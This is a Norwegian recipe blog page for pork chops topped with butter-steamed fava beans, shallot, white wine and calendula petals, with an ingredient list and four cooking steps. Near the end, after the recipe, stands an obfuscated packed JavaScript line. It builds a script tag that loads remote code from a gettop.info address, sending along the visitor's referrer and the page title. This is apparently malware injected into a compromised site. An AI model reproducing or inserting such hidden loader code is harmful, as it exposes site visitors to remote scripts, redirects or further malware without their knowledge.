Svinekotelett med hestebønner og ringblomst

svinekotelett

Bondebønner, hestebønner, favabønner – kjært barn har mange navn. Disse bønnen er helt fantastisk i smak akkurat nå. Du får dem på Bondens marked og sikkert mange andre steder også som har et bredt utvalg av grønnsaker. Et smart tips er å kjøpe inn mengder og fryse ned. Da må du først forvelle dem før du legger dem i fryseren, herlig å plukke frem en kald vinterdag. Smaker godt i en rykende varm suppe skal jeg love deg. Her har jeg enkelt og greit, i all hast, i en hektisk hverdag, smørdampet bønnene med litt sjalottløk og en god del smør, litt hvitvin og så noen blader ringblomst på toppen. Mat som man blir glad av å spise! Superenkelt å lage!

bondebc3b8nner1

Ingredienser

4 pers

4 svinekoteletter

ca 700 gr hestebønner m belg

1 sjalottløk

100 gr smør

1/2 dl hvitvin

salt og pepper

ringblomstblader

favabc3b8nner

1. Varm en sauteepanne med smør og hvitvin, plukk bønnene ut av belgen og legg over i pannen, tilsett salt, legg over lokk og damp i et par minutter.

2. Sil av kraften og sett til side. Fjern den hvite hinnen fra selve bønnen, bruk en kniv og snitt så blir det enklere å presse bønnen ut av den hvite hinnen.

3. Finhakk sjalottløk og fres av i kraften. Bland med de grønne bønnene og varm opp på nytt, smak av med salt og pepper og litt sitronsaft, eventuelt litt mer smør.

4. Stek svinekotelettene i smør og fordel rikelig med hestebønner over kjøttet, dryss over ringblomstblader helt til slutt.

svinekotelett

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Write a comment

Your email address will not be published. Required fields are marked *